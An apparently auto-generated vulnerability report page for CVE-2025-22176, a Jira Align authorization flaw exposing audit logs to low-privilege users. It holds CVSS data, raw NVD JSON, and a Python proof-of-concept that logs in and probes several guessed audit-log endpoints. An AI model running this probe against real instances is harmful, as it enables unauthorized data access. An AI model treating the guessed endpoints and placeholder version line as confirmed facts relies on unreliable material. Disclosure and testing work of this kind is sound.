Security Vulnerability Report
中文
CVE-2025-22176 CVSS 4.3 MEDIUM

CVE-2025-22176

Published: 2025-10-22 17:15:58
Last Modified: 2025-10-24 14:20:53

Description

Jira Align is vulnerable to an authorization issue. A low-privilege user can access unexpected endpoints that disclose a small amount of sensitive information. For example, a low-level user was able to view audit log items.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:atlassian:jira_align:*:*:*:*:*:*:*:* - VULNERABLE
Jira Align < 受影响版本(具体版本号需查看官方公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-22176 PoC - Jira Align Authorization Bypass # Description: Low-privilege user can access audit log endpoints import requests import json # Configuration JIRA_ALIGN_URL = "https://your-jira-align-instance.atlassian.com" USERNAME = "[email protected]" PASSWORD = "user_password" def exploit_cve_2025_22176(): """ Exploit for CVE-2025-22176: Jira Align Authorization Bypass This PoC demonstrates how a low-privilege user can access audit log endpoints """ # Step 1: Authenticate with low-privilege account login_url = f"{JIRA_ALIGN_URL}/rest/auth/latest/session" login_data = { "username": USERNAME, "password": PASSWORD } session = requests.Session() response = session.post(login_url, json=login_data, verify=False) if response.status_code != 200: print(f"[-] Authentication failed: {response.status_code}") return False print("[+] Successfully authenticated as low-privilege user") # Step 2: Attempt to access audit log endpoint (requires higher privileges) audit_endpoints = [ "/rest/align/latest/audit-logs", "/rest/align/latest/audit", "/rest/audit-logs/latest", "/rest/audit/latest" ] for endpoint in audit_endpoints: url = f"{JIRA_ALIGN_URL}{endpoint}" headers = { "Content-Type": "application/json", "X-Atlassian-Token": "no-check" } response = session.get(url, headers=headers, verify=False) if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint} accessible with low privileges") try: audit_data = response.json() print(f"[+] Retrieved audit log data: {json.dumps(audit_data, indent=2)[:500]}") return True except: print(f"[+] Endpoint accessible but no JSON response") elif response.status_code == 403: print(f"[-] Protected: {endpoint} (403 Forbidden)") else: print(f"[*] Status {response.status_code}: {endpoint}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-22176 PoC - Jira Align Authorization Bypass") print("=" * 60) exploit_cve_2025_22176()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-22176", "sourceIdentifier": "[email protected]", "published": "2025-10-22T17:15:58.050", "lastModified": "2025-10-24T14:20:53.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jira Align is vulnerable to an authorization issue. A low-privilege user can access unexpected endpoints that disclose a small amount of sensitive information. For example, a low-level user was able to view audit log items."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:atlassian:jira_align:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.14.0", "versionEndExcluding": "11.16.1", "matchCriteriaId": "FE85D038-4C13-4104-B53E-F3022F5D8117"}]}]}], "references": [{"url": "https://jira.atlassian.com/browse/JIRAALIGN-8645", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}